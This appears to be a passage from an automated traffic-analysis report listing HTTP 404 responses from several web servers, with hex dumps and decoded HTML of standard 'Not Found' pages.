57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 08:10:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cd104a-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 08:10:57 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 08:11:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 08:11:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 08:11:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:11:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJYBfm7tqo4fWLG5k%2BPUNyzicqDNMpOMPP8Lhk9gSxTuZmNQZBx0ce4elKfNMVrED7p2ulX%2Bq3jZqUHWC9R9xXqYxNBBDYVaRTqUFuOww61ExWBNG8%2BUl26Rs1B%2Fpuu4SGhM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c162f8128428c6b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a 72 6b c8 e2 43 c4 47 d5 84 d9 1d 55 8d 33 
aa 4c ea 5c e4 d5 42 67 b1 ad 96 cf 9d a6 31 88 48 6c f9 e8 1a 6e e2 3e a9 9f f5 85 5e d6 b3 6a a8 ef 34 82 c7 e0 b6 be 8d 8b 1f 5b 0c 8c 0a 5a b7 35 0a ac 63 68 10 ba 68 03 ce 02 6b 0a 10 d0 8f e8 2f aa c5 50 cf aa 85 a2 b1 3e cd 4f 28 3d 35 4d 27 a2 3c cb 72 39 ec cb 53 fa 53 85 06 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SS
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 08:11:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachevary: User-Agentx-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8kyXab7dwYi%2BYzMhyl6eTU3nEQ%2BTalvjUidLASj8LLz8AcLn8ywE1nD%2F88tGJL%2BbUA%2BTIuuZLplZXJo6c45XWCO05C%2FKynysmthn15S4fFLkimLu9E2t55GRLrXBdipo%2FdL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c162f90fa6c0f7f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 